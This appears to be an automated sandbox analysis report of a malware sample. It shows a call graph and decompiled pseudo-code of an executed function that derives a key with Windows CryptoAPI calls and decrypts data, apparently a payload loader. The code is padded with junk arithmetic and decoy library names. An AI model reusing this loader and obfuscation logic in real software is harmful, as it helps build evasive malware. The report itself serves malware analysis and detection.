21366 87971f CryptGetHashParam 21366->21363 21367 879740 21366->21367 21369 8797f1 21367->21369 21388 8770c4 41 API calls 21367->21388 21369->21268 21381 881948 21370->21381 21371 881f35 CryptAcquireContextA 21372 881f52 21371->21372 21376 884e70 21371->21376 21373 88218f CryptCreateHash 21372->21373 21374 884a59 CryptReleaseContext 21373->21374 21379 8821ae 21373->21379 21375 884a85 21374->21375 21375->21271 21376->21271 21377 8825a5 CryptHashData 21378 8825c1 21377->21378 21384 8834a6 21377->21384 21380 8826f6 CryptDeriveKey 21378->21380 21379->21377 21382 88271c 21380->21382 21380->21384 21381->21371 21383 882840 CryptDecrypt 21382->21383 21386 882874 21383->21386 21384->21271 21385 883485 CryptDestroyKey 21385->21384 21386->21385 21387->21366 21388->21363 21390 40a92e 21389->21390 21390->21278 21391->21288 21393 407268 GetTickCount 21392->21393 21394 40725d 21392->21394 21393->21293 21394->21293 21396 409da2 SysAllocStringLen 21395->21396 21397 409db8 21395->21397 21396->21397 21398 409c78 21396->21398 21397->21311 21399 409cf4 21398->21399 21400 409ce6 SysFreeString 21398->21400 21399->21311 21400->21399 21402 409c78 21401->21402 21403 409e58 SysAllocStringLen 21401->21403 21404 409cf4 21402->21404 21405 409ce6 SysFreeString 21402->21405 21403->21402 21406 409e69 SysFreeString 21403->21406 21404->21327 21405->21404 21406->21327 21408 87142c 21407->21408 21420 40a884 21408->21420 21410 8715d5 21411 8716d4 GetShortPathNameW 21410->21411 21414 8716e9 21411->21414 21412 871fea 21413 40a884 3 API calls 21412->21413 21418 871ff5 21413->21418 21414->21412 21415 40a884 3 API calls 21414->21415 21416 871d92 21415->21416 21417 871fe0 GetShortPathNameW 21416->21417 21417->21412 21418->21329 21419->21331 21421 40a891 21420->21421 21425 40a898 21420->21425 21429 409c78 SysAllocStringLen SysFreeString 21421->21429 21426 40a63c 21425->21426 21427 40a642 SysFreeString 21426->21427 21428 40a648 21426->21428 21427->21428 21428->21410 21429->21425 21431 405d01 21430->21431 21432 405de4 21430->21432 21437 405d7e Sleep 21431->21437 21438 405d07 21431->21438 21433 405778 21432->21433 21432->21438 21435 405ede 21433->21435 21436 4056c8 2 API calls 21433->21436 21434 405d10 21434->21343 21435->21343 21439 405789 21436->21439 21437->21438 21440 405d98 Sleep 21437->21440 21438->21434 21441 405dc2 Sleep 21438->21441 21448 405df9 21438->21448 21442 4057b9 21439->21442 21443 40579f VirtualFree 21439->21443 21440->21431 21444 405dd8 Sleep 21441->21444 21441->21448 21445 4057b0 21442->21445 21446 4057c2 VirtualQuery VirtualFree 21442->21446 21443->21445 21444->21438 21445->21343 21446->21442 21446->21445 21447 405e78 VirtualFree 21447->21343 21448->21447 21449 405e1c 21448->21449 21449->21343 21451 40966c 21450->21451 21452 409637 21450->21452 21451->21215 21452->21451 21453 409666 KiUserCallbackDispatcher 21452->21453 21453->21452 21454->21212 21455 878832 48 API calls 21463 4061fc 10 API calls

                                                              Executed Functions

                                                              Function 00881940 Relevance: 103.7, APIs: 7, Strings: 51, Instructions: 2165COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 77%
                                                              			E00881940(intOrPtr* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				char _v13;
				long* _v20;
				long* _v24;
				char _v28;
				int _v32;
				char _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				void* _v93;
				void* _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				signed int _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				intOrPtr _v120;
				signed int _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				intOrPtr _v132;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v141;
				char _v148;
				char _v149;
				char _v150;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				char _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				char _v308;
				char _v312;
				char _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				char _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				char _v492;
				char _v500;
				char _v508;
				char _v516;
				char _v524;
				char _v536;
				char _v548;
				char _v560;
				char _v564;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				char _v700;
				char _v704;
				char _v708;
				char _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				char _v724;
				char _v728;
				char _v736;
				char _v1348;
				int _t1022;
				signed int _t1029;
				signed int _t1031;
				signed int _t1074;
				intOrPtr _t1075;
				intOrPtr _t1084;
				signed int _t1085;
				intOrPtr _t1133;
				intOrPtr* _t1182;
				intOrPtr* _t1187;
				intOrPtr* _t1192;
				intOrPtr* _t1197;
				intOrPtr* _t1218;
				intOrPtr* _t1223;
				intOrPtr* _t1228;
				signed int _t1262;
				signed int _t1266;
				signed int _t1271;
				signed int _t1273;
				signed int _t1275;
				intOrPtr _t1277;
				intOrPtr _t1280;
				signed int _t1287;
				void* _t1293;
				intOrPtr _t1324;
				intOrPtr _t1330;
				intOrPtr _t1356;
				intOrPtr _t1382;
				intOrPtr _t1390;
				signed int _t1391;
				signed int _t1392;
				signed int _t1401;
				intOrPtr _t1403;
				signed int _t1406;
				char* _t1443;
				char* _t1446;
				char* _t1451;
				char* _t1456;
				char* _t1461;
				char* _t1466;
				char* _t1475;
				char* _t1480;
				char* _t1485;
				signed int _t1512;
				intOrPtr _t1545;
				signed int _t1549;
				intOrPtr* _t1555;
				intOrPtr* _t1560;
				intOrPtr* _t1565;
				intOrPtr* _t1570;
				signed int _t1653;
				intOrPtr _t1658;
				signed int _t1667;
				signed int _t1675;
				intOrPtr _t1680;
				signed int _t1696;
				signed int _t1732;
				intOrPtr _t1735;
				intOrPtr _t1737;
				intOrPtr* _t1753;
				intOrPtr* _t1758;
				intOrPtr* _t1763;
				intOrPtr* _t1768;
				intOrPtr* _t1773;
				intOrPtr* _t1778;
				intOrPtr* _t1783;
				intOrPtr* _t1788;
				intOrPtr* _t1793;
				signed int _t1877;
				intOrPtr _t1879;
				intOrPtr _t1881;
				intOrPtr _t1884;
				intOrPtr _t1886;
				intOrPtr _t1893;
				intOrPtr _t1895;
				intOrPtr _t1909;
				intOrPtr _t1911;
				signed int _t1912;
				signed int _t1913;
				signed int _t1915;
				intOrPtr* _t1929;
				intOrPtr* _t1934;
				intOrPtr* _t1939;
				intOrPtr* _t1944;
				intOrPtr* _t2013;
				intOrPtr* _t2018;
				char* _t2023;
				char* _t2026;
				void* _t2054;
				intOrPtr _t2202;
				intOrPtr _t2203;
				intOrPtr _t2216;
				intOrPtr _t2218;
				intOrPtr _t2237;
				intOrPtr _t2252;
				intOrPtr _t2267;
				intOrPtr _t2284;
				intOrPtr _t2285;
				intOrPtr* _t2302;
				intOrPtr* _t2305;
				intOrPtr* _t2309;
				intOrPtr* _t2313;
				intOrPtr* _t2317;
				intOrPtr* _t2321;
				intOrPtr* _t2327;
				intOrPtr* _t2331;
				intOrPtr* _t2335;
				signed int _t2430;
				intOrPtr _t2471;
				intOrPtr* _t2536;
				intOrPtr* _t2539;
				intOrPtr _t2564;
				intOrPtr _t2565;
				char _t2583;
				int _t2584;
				void* _t2602;
				void* _t2603;
				char _t2627;

				_t2562 = __esi;
				_t2561 = __edi;
				_t2053 = __ebx;
				_t2564 = _t2565;
				_t2054 = 0xa8;
				do {
					_push(0);
					_push(0);
					_t2054 = _t2054 - 1;
				} while (_t2054 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E00409D8C(_v12);
				_push(_t2564);
				_push(0x8852e2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t2565;
				_v13 = 0;
				_push(_t2564);
				_push(0x884f29);
				_push( *[fs:eax]);
				 *[fs:eax] = _t2565;
				E0040A0C0( &_v36, _v40);
				_v64 = _v56 + 0xe7;
				_v80 = 0;
				if(_v80 < 8) {
					_t1929 =  *0x8a9d58; // 0x8b0913
					_v95 =  *_t1929;
					if(_v95 + 0x9f - 0x1a < 0) {
						_v95 = _v95 - 0x20;
					}
					_t1934 =  *0x8a9cf4; // 0x8b0911
					_v96 =  *_t1934;
					if(_v96 + 0x9f - 0x1a < 0) {
						_v96 = _v96 - 0x20;
					}
					_t1939 =  *0x8a9f14; // 0x8b0922
					_v97 =  *_t1939;
					if(_v97 + 0x9f - 0x1a < 0) {
						_v97 = _v97 - 0x20;
					}
					_t1944 =  *0x8a9ce4; // 0x8b0912
					_v98 =  *_t1944;
					if(_v98 + 0x9f - 0x1a < 0) {
						_v98 = _v98 - 0x20;
					}
					E0040A3C0(0);
					_push(_v164);
					E0040A3C0(0);
					_push(_v168);
					E0040A3C0(0);
					_push(_v172);
					E0040A3C0(0);
					_push(_v176);
					E0040A3C0(0);
					_push(_v180);
					E0040A3C0(0);
					_push(_v184);
					E0040A3C0(0);
					_push(_v188);
					E0040A3C0(0);
					_push(_v192);
					E0040A3C0(0);
					_push(_v196);
					E0040A3C0(0);
					_push(_v200);
					E0040A3C0(0);
					_push(_v204);
					E0040A3C0(0);
					_push(_v208);
					E0040A3C0(0);
					_push(_v212);
					E0040A3C0(0);
					_push(_v216);
					E0040A3C0(0);
					_push(_v220);
					E0040A3C0(0);
					_push(_v224);
					E0040A3C0(0);
					_push(_v228);
					E0040A3C0(0);
					_push(_v232);
					E0040A3C0(0);
					_push(_v236);
					E0040A3C0(0);
					_push(_v240);
					E0040A3C0(0);
					_push(_v244);
					E0040A3C0(0);
					_push(_v248);
					E0040A3C0(0);
					E0040A494( &_v160, _t2053, 0x17, _t2561, _t2562);
					E0040A9E8( &_v36, _v160, _v252);
					_v84 = 0;
					_v92 = _v48 + _v48 + (_v48 + _v48) * 4;
					_v88 = _v76 + 0xda;
					E0040A0C0( &_v40, _v40);
					E0040A0C0( &_v36, L"System.IO.dll");
					E0040A0C0( &_v36, _v40);
					E0040A0C0( &_v36, _v40);
					_t2013 =  *0x8a9d58; // 0x8b0913
					_v99 =  *_t2013;
					if(_v99 + 0x9f - 0x1a < 0) {
						_v99 = _v99 - 0x20;
					}
					_t2018 =  *0x8a9c3c; // 0x8b0918
					_v100 =  *_t2018;
					if(_v100 + 0x9f - 0x1a < 0) {
						_t112 =  &_v100;
						 *_t112 = _v100 - 0x20;
						_t2583 =  *_t112;
					}
					_t2023 =  &_v264;
					_t2536 =  *0x8a9ce4; // 0x8b0912
					 *((char*)(_t2023 + 1)) =  *_t2536;
					 *_t2023 = 1;
					E0040A324( &_v268,  &_v264);
					_t2026 =  &_v272;
					_t2539 =  *0x8aa0b4; // 0x8b091f
					 *((char*)(_t2026 + 1)) =  *_t2539;
					 *_t2026 = 1;
					E0040A34C( &_v268, 2,  &_v272);
					E0040A444( &_v260, 0,  &_v268, _t2583);
					_push(_v260);
					E0040A3C0(0);
					_push(_v276);
					E0040A3C0(0);
					_push(_v280);
					E0040A3C0(0);
					_push(_v284);
					E0040A3C0(0);
					_push(_v288);
					E0040A3C0(0);
					_push(_v292);
					E0040A3C0(0);
					_push(_v296);
					_push(0x88532c);
					E0040A3C0(0);
					_push(_v300);
					E0040A3C0(0);
					_push(_v304);
					E0040A3C0(0);
					E0040A494( &_v256, _t2053, 0xb, _t2561, _t2562);
					E0040A9E8( &_v36, _v256, _v308);
				}
				E0040A0C0( &_v40, _v40);
				E0040ACEC(_v40, 1, 1,  &_v40);
				E0040ACEC(_v36, 0, 1,  &_v40);
				_t1022 = CryptAcquireContextA( &_v20, 0, 0, 0x18, 0xf0000000); // executed
				_t2584 = _t1022;
				if(_t2584 == 0) {
					__eflags = 0;
					_v88 = 0;
					do {
						_v84 = 0;
						__eflags = _v84 - 6;
						while(_v84 < 6) {
							_v84 = _v84 + 1;
							_v44 = _v60 * 0x69;
							_v52 = _v48 + _v56;
							_v68 = 0x2c - _v64;
							 *0x8a9b40 =  *0x8a9af4 * 0x44;
							 *0x8a9a40 = 0x73 -  *0x8a9a98;
							asm("fild dword [0x8a9b18]");
							 *0x8a9b24 = E004076E8();
							__eflags = _v84 - 6;
						}
						_v88 = _v88 + 1;
						__eflags = _v88 - 1;
					} while (_v88 != 1);
					E0040A0C0( &_v36, _v36);
					 *0x8a9b08 = 0;
					E008764FC(_t2053, _t2561, _t2562);
					_t1029 =  *0x8a9ad4; // 0xa40b347
					 *0x8a9ad4 = E00407278(_t1029);
					_t1031 =  *0x8a9b28; // 0x3d5d8347
					 *0x8a9b30 = _t1031 *  *0x8a9abc;
					E0040A0C0( &_v36, L"CustomMarshalers.dll");
					_pop(_t2202);
					 *[fs:eax] = _t2202;
					__eflags = 0;
					_pop(_t2203);
					 *[fs:eax] = _t2203;
					_push(E008852EC);
					E00409D28( &_v1348, 0xd);
					E00409D28( &_v736, 2);
					E00409C98( &_v728);
					E00409D28( &_v724, 0xb);
					E00409C98( &_v564);
					E00409D28( &_v492, 0x2d);
					E00409D28( &_v308, 9);
					E00409D28( &_v260, 2);
					E00409D28( &_v220, 0x10);
					E00409D28( &_v252, 8);
					E00409CBC( &_v148);
					E00409CF8( &_v40, 2);
					return E00409CBC( &_v12);
				} else {
					E0040ACB4(_v40, L"System.Configuration.Install.ni.dll");
					if(_t2584 != 0) {
						_t1074 =  *0x8a9a28; // 0x0
						_v104 = _t1074;
						__eflags = _v104;
						if(_v104 != 0) {
							_t1915 = _v104 - 4;
							__eflags = _t1915;
							_v104 =  *_t1915;
						}
						__eflags = _v104 - 0x11;
						if(_v104 == 0x11) {
							_v312 = _v76 + 0xd2;
							asm("fild dword [ebp-0x134]");
							_v48 = E004076E8();
							_v60 = _v52 * _v68;
							_v72 = _v92 * _v80;
							_t1909 =  *0x8a9b1c; // 0xd2d18e86
							 *0x8a9b90 = _t1909 +  *0x8a9ac0;
							_t1911 =  *0x8a99e4; // 0xffdbe445
							_t1912 = _t1911 - 0x45;
							__eflags = _t1912;
							 *0x8a9a70 = _t1912;
							_t1913 =  *0x8a9b78; // 0xe152
							 *0x8a9ad4 = _t1913;
						}
					} else {
						_v56 = 0;
						E008764FC(_t2053, _t2561, _t2562);
					}
					_t1075 =  *0x8a9a64; // 0x3d5d8300
					 *0x8a9bc0 = _t1075 + E008A9A8C;
					E0040A0C0( &_v36, _v40);
					E0040A0C0( &_v36, _v36);
					_v64 = 0;
					_t2585 = _v64 - 3;
					while(_v64 < 3) {
						_v64 = _v64 + 1;
						 *0x8a9a88 = 0;
						E0087301C(_v56, _t2053, _v52, _v44, _t2585, _v64);
					}
					if(_v72 + _v64 <= _v64) {
						_t1084 =  *0x8a9a6c; // 0xd2d18e86
						_t1085 = _t1084 - 0x24;
						__eflags = _t1085;
						E008A9A8C = _t1085;
					} else {
						if(E0040AEFC(L"RtlDelete", 1, _v40) - 1 >= 0) {
							_t1877 =  *0x8a9a9c; // 0xdd124098
							 *0x8a9abc = _t1877 + 0xb3;
							_t1879 =  *0x8a9b24; // 0x3d5d8262
							 *0x8a9b3c = _t1879 + 0xaf;
							_t1881 =  *0x8a9b88; // 0x95740b86
							 *0x8a9bb0 = _t1881 + 0xac;
							 *0x8a9a9c =  *0x8a9a70 * 0xa9;
							_t1884 =  *0x8a9b38; // 0xfde44b1c
							 *0x8a9b1c = _t1884 - 0x40;
							_t1886 =  *0x8a9a58; // 0x22edbf74
							 *0x8a9b7c = _t1886 + 4;
						} else {
							asm("fild dword [0x8a9b84]");
							 *0x8a9a78 = E004076F4();
							 *0x8a9aec =  *0x8a9b04 * 0xc6;
							 *0x8a9b64 =  *0x8a9b70 * 0xc3;
							 *0x8a99e4 = 0xf4 -  *0x8a9ae4;
							_t1893 =  *0x8a9b94; // 0xf78b0ce1
							 *0x8a9aa4 = _t1893 + 0x8a;
							_t1895 =  *0x8a9ac8; // 0x9636d2f3
							_v312 = _t1895 + 0x21;
							asm("fild dword [ebp-0x134]");
							 *0x8a9b24 = E004076E8();
						}
					}
					_push(_t2564);
					_push(0x884b2e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t2565;
					_v80 = 0;
					while(_v80 < 0xc) {
						_v80 = _v80 + 1;
						_v60 = _v56 - _v64;
						_t2590 = _v80 - 0xc;
					}
					 *0x8a9b88 = 0;
					_t2216 =  *0x8a9aa4; // 0xf5bf4f76
					E0087FA9C(_v56, _t2216, _t2590);
					_v72 = _v84;
					_v48 = _v52 + 0xc3;
					_v76 = _v44 - _v92;
					E0040A0C0( &_v36, _v40);
					_push( &_v28);
					_push(0);
					_push(0);
					_push(0x8003);
					_push(_v20);
					if( *0x8b124c() == 0) {
						_pop(_t2218);
						 *[fs:eax] = _t2218;
						_push(E00884B38);
						CryptReleaseContext(_v20, 0);
						E0040ACEC(_v36, 0, 1,  &_v36);
						_v72 = _v84 + 0x24;
						_v80 = 0;
						__eflags = _v80 - 3;
						while(_v80 < 3) {
							_v80 = _v80 + 1;
							_v56 = 0;
							__eflags = _v56 - 0xb;
							while(_v56 < 0xb) {
								_v56 = _v56 + 1;
								_v44 = _v52 + 0x9a;
								E0040A0C0( &_v36, _v36);
								E0040ACEC(_v40, 1, 1,  &_v36);
								_v68 = _v76 + _v76 * 8 + (_v76 + _v76 * 8) * 8;
								E0040A0C0( &_v40, _v36);
								E0040A0C0( &_v36, _v40);
								__eflags = _v56 - 0xb;
							}
							__eflags = _v80 - 3;
						}
						E0040A0C0( &_v40, _v36);
						E0040A0C0( &_v36, _v40);
						__eflags = 0;
						return E0040ACEC(_v36, 0, 1,  &_v40);
					} else {
						_push(_t2564);
						_push(0x88495d);
						_push( *[fs:eax]);
						 *[fs:eax] = _t2565;
						_t1133 =  *0x8a99d4; // 0x0
						E0040ACB4(_t1133, L"OleCreateFromDataEx");
						if(0 != 0) {
							__eflags = _v76 - _v80 - _v76;
							if(_v76 - _v80 < _v76) {
								_t1753 =  *0x8aa1dc; // 0x8b0921
								_v105 =  *_t1753;
								__eflags = _v105 + 0x9f - 0x1a;
								if(_v105 + 0x9f - 0x1a < 0) {
									_t262 =  &_v105;
									 *_t262 = _v105 - 0x20;
									__eflags =  *_t262;
								}
								_t1758 =  *0x8a9fcc; // 0x8b0927
								_v106 =  *_t1758;
								__eflags = _v106 + 0x9f - 0x1a;
								if(_v106 + 0x9f - 0x1a < 0) {
									_t266 =  &_v106;
									 *_t266 = _v106 - 0x20;
									__eflags =  *_t266;
								}
								_t1763 =  *0x8aa15c; // 0x8b091c
								_v107 =  *_t1763;
								__eflags = _v107 + 0x9f - 0x1a;
								if(_v107 + 0x9f - 0x1a < 0) {
									_t270 =  &_v107;
									 *_t270 = _v107 - 0x20;
									__eflags =  *_t270;
								}
								_t1768 =  *0x8aa1dc; // 0x8b0921
								_v108 =  *_t1768;
								__eflags = _v108 + 0x9f - 0x1a;
								if(_v108 + 0x9f - 0x1a < 0) {
									_t274 =  &_v108;
									 *_t274 = _v108 - 0x20;
									__eflags =  *_t274;
								}
								_t1773 =  *0x8a9ffc; // 0x8b091a
								_v109 =  *_t1773;
								__eflags = _v109 + 0x9f - 0x1a;
								if(_v109 + 0x9f - 0x1a < 0) {
									_t278 =  &_v109;
									 *_t278 = _v109 - 0x20;
									__eflags =  *_t278;
								}
								_t1778 =  *0x8a9e60; // 0x8b0923
								_v110 =  *_t1778;
								__eflags = _v110 + 0x9f - 0x1a;
								if(_v110 + 0x9f - 0x1a < 0) {
									_t282 =  &_v110;
									 *_t282 = _v110 - 0x20;
									__eflags =  *_t282;
								}
								_t1783 =  *0x8aa15c; // 0x8b091c
								_v111 =  *_t1783;
								_t285 =  &_v111; // 0x74
								__eflags =  *_t285 + 0x9f - 0x1a;
								if( *_t285 + 0x9f - 0x1a < 0) {
									_t286 =  &_v111;
									 *_t286 = _v111 - 0x20;
									__eflags =  *_t286;
								}
								_t1788 =  *0x8a9f14; // 0x8b0922
								_v112 =  *_t1788;
								__eflags = _v112 + 0x9f - 0x1a;
								if(_v112 + 0x9f - 0x1a < 0) {
									_t290 =  &_v112;
									 *_t290 = _v112 - 0x20;
									__eflags =  *_t290;
								}
								_t1793 =  *0x8a9f14; // 0x8b0922
								_v113 =  *_t1793;
								__eflags = _v113 + 0x9f - 0x1a;
								if(_v113 + 0x9f - 0x1a < 0) {
									_t294 =  &_v113;
									 *_t294 = _v113 - 0x20;
									__eflags =  *_t294;
								}
								E0040A3C0(0);
								_push(_v320);
								E0040A3C0(0);
								_push(_v324);
								E0040A3C0(0);
								_push(_v328);
								E0040A3C0(0);
								_push(_v332);
								E0040A3C0(0);
								_push(_v336);
								E0040A3C0(0);
								_push(_v340);
								_push(0x88532c);
								E0040A3C0(0);
								_push(_v344);
								E0040A3C0(0);
								_push(_v348);
								E0040A3C0(0);
								E0040A494( &_v316, _t2053, 0xa, _t2561, _t2562);
								E0040A9E8( &_v40, _v316, _v352);
								E0040A0C0( &_v36, _v36);
								E0040A0C0( &_v40, _v36);
								E0040A0C0( &_v36, _v36);
								E0040ACEC(_v40, 1, 1,  &_v36);
								E0040A0C0( &_v40, _v36);
							}
						} else {
							if(_v60 - _v64 == _v76) {
								asm("fild dword [ebp-0x3c]");
								_v88 = E004076E8();
								_v48 = _v68 * 0xe2;
								_v56 = _v84 - 0xd6;
								_v72 = _v76 - _v60;
								E0040A0C0( &_v40, _v36);
								E0040A0C0( &_v36, _v36);
							}
							_t2471 =  *0x8a99d4; // 0x0
							if(E0040AEFC(L"Api-ms-win-downlevel-advapi32-l1-1-1.dll", 1, _t2471) >= 0x7e) {
								E0040A0C0( &_v40, _v36);
								E0040A0C0( &_v40, L"oleacchooks.dll");
								E0040A0C0( &_v36, _v36);
								E0040A0C0( &_v36, _v40);
								E0040A0C0( &_v40, _v36);
								E0040ACEC(_v36, 0, 1,  &_v40);
							} else {
								E0040ACEC(_v40, 1, 1,  &_v36);
								E0040A0C0( &_v36, _v36);
								E0040A0C0( &_v40, _v40);
								E0040ACEC(_v36, 0, 1,  &_v40);
								E0040A0C0( &_v36, _v36);
								E0040A0C0( &_v40, _v36);
							}
						}
						if(_v76 - _v44 >= _v76) {
							E0040A0C0( &_v36, _v36);
							E0040A0C0( &_v36, _v40);
							E0040A0C0( &_v36, L"NlsData0047.dll");
						} else {
							E0040A0C0( &_v36, _v36);
							E0040A0C0( &_v40, _v40);
							E0040A0C0( &_v40, _v36);
							E0040A0C0( &_v36, L"SensorsApi.dll");
						}
						E0040A0C0( &_v36, _v40);
						E0040A0C0( &_v36, _v36);
						E0040A0C0( &_v36, _v40);
						E0040A0C0( &_v36, _v36);
						_v120 = _v12;
						if(_v120 != 0) {
							_v120 =  *((intOrPtr*)(_v120 - 4));
						}
						_push(0);
						_push(_v120);
						_push(_v12);
						_push(_v28);
						if( *0x8b1250() == 0) {
							L136:
							E0040A0C0( &_v36, _v36);
							_v60 = _v80 + _v72;
							asm("fild dword [ebp-0x40]");
							_v64 = E004076E8();
							_v92 = _v76;
							_v88 = _v84 + _v56;
							E0040A0C0( &_v40, _v36);
							_pop(_t2237);
							 *[fs:eax] = _t2237;
							_push(E00884967);
							_v68 = _v92 + 0xe6;
							_v72 = _v88 + 0xd8;
							_v84 = 0x60 - _v48;
							_v52 = _v56 - _v80;
							__eflags = _v76 - _v68 - _v76;
							if(_v76 - _v68 >= _v76) {
								E0040A0C0( &_v36, L"FXSCOVER.exe");
							} else {
								__eflags = _v72 + 0xc2 - _v64;
								if(_v72 + 0xc2 < _v64) {
									E0040ACEC(_v40, 1, 1,  &_v40);
									E0040A0C0( &_v36, _v36);
									E0040A0C0( &_v36, _v36);
									E0040A0C0( &_v36, _v40);
									E0040A0C0( &_v40, _v36);
									E0040A0C0( &_v40, L"RtlUnicodeStringToOemSize");
								}
							}
							_push(_t2564);
							_push(0x883f65);
							_push( *[fs:eax]);
							 *[fs:eax] = _t2565;
							_t1182 =  *0x8a9f40; // 0x8b0925
							_v137 =  *_t1182;
							__eflags = _v137 + 0x9f - 0x1a;
							if(_v137 + 0x9f - 0x1a < 0) {
								_t871 =  &_v137;
								 *_t871 = _v137 - 0x20;
								__eflags =  *_t871;
							}
							_t1187 =  *0x8aa0b8; // 0x8b0928
							_v138 =  *_t1187;
							__eflags = _v138 + 0x9f - 0x1a;
							if(_v138 + 0x9f - 0x1a < 0) {
								_t875 =  &_v138;
								 *_t875 = _v138 - 0x20;
								__eflags =  *_t875;
							}
							_t1192 =  *0x8aa0b4; // 0x8b091f
							_v139 =  *_t1192;
							__eflags = _v139 + 0x9f - 0x1a;
							if(_v139 + 0x9f - 0x1a < 0) {
								_t879 =  &_v139;
								 *_t879 = _v139 - 0x20;
								__eflags =  *_t879;
							}
							_t1197 =  *0x8a9f14; // 0x8b0922
							_v140 =  *_t1197;
							__eflags = _v140 + 0x9f - 0x1a;
							if(__eflags < 0) {
								_t883 =  &_v140;
								 *_t883 = _v140 - 0x20;
								__eflags =  *_t883;
							}
							E0040A3C0(0);
							_push(_v684);
							E0040A3C0(0);
							_push(_v688);
							E0040A3C0(0);
							_push(_v692);
							E0040A3C0(0);
							_push(_v696);
							E006BA5A8(6,  &_v700, __eflags);
							_push(_v700);
							E006BA5A8(0,  &_v704, __eflags);
							_push(_v704);
							E006BA5A8(0,  &_v708, __eflags);
							_push(_v708);
							_push(0x88532c);
							E0040A494( &_v148, _t2053, 8, _t2561, _t2562);
							_t1218 =  *0x8aa15c; // 0x8b091c
							_v141 =  *_t1218;
							__eflags = _v141 + 0x9f - 0x1a;
							if(_v141 + 0x9f - 0x1a < 0) {
								_t906 =  &_v141;
								 *_t906 = _v141 - 0x20;
								__eflags =  *_t906;
							}
							_t1223 =  *0x8a9f14; // 0x8b0922
							_v149 =  *_t1223;
							__eflags = _v149 + 0x9f - 0x1a;
							if(_v149 + 0x9f - 0x1a < 0) {
								_t910 =  &_v149;
								 *_t910 = _v149 - 0x20;
								__eflags =  *_t910;
							}
							_t1228 =  *0x8a9f14; // 0x8b0922
							_v150 =  *_t1228;
							__eflags = _v150 + 0x9f - 0x1a;
							if(_v150 + 0x9f - 0x1a < 0) {
								_t914 =  &_v150;
								 *_t914 = _v150 - 0x20;
								__eflags =  *_t914;
							}
							_push(_v148);
							E0040A3C0(0);
							_push(_v716);
							E0040A3C0(0);
							_push(_v720);
							E0040A3C0(0);
							E0040A494( &_v712, _t2053, 4, _t2561, _t2562);
							E0040A9E8( &_v36, _v712, _v724);
							__eflags = 0;
							_pop(_t2252);
							 *[fs:eax] = _t2252;
							_push(E00883F6C);
							return E00409CBC( &_v148);
						} else {
							_v80 = 0;
							while(_v80 < 9) {
								_v80 = _v80 + 1;
								_v312 = _v88 + 0xb7;
								asm("fild dword [ebp-0x134]");
								_v60 = E004076E8();
							}
							_t1262 =  *0x8a9abc; // 0x46db6e96
							 *0x8a9abc = E00407278(_t1262);
							_v68 = 0xe0 - _v92;
							_t1266 =  *0x8a9b54; // 0x3d5d8300
							_t2602 = _t1266 + 0xf8 -  *0x8a9a84; // 0xf5bf4ea3
							if(_t2602 >= 0) {
								__eflags = 0;
								_v76 = 0;
								do {
									_v44 = _v84 + _v48;
									_t1271 =  *0x8a9b98; // 0x6c1f3d8e
									 *0x8a9ac4 = _t1271 + 0xa2;
									_t1273 =  *0x8a9b4c; // 0x3d5d8266
									 *0x8a9b64 = _t1273 *  *0x8a9a70;
									_t1275 =  *0x8a9af4; // 0x4c5f602c
									 *0x8a9a70 = _t1275 +  *0x8a9b30;
									_t1277 =  *0x8a9a50; // 0x21bb532
									 *0x8a9b30 = _t1277 +  *0x8a9ad4;
									 *0x8a9a3c =  *0x8a9b50 * 0x2a;
									_v76 = _v76 + 1;
									__eflags = _v76 - 5;
								} while (_v76 != 5);
							} else {
								_t1737 =  *0x8a9af0; // 0x3e3c55b
								 *0x8a9af0 = E00407278(_t1737);
							}
							_t1280 =  *0x8a9a84; // 0xf5bf4ea3
							_t2603 = _t1280 - E008A9A8C -  *0x8a9b54; // 0x3d5d8300
							if(_t2603 != 0) {
								__eflags = 0;
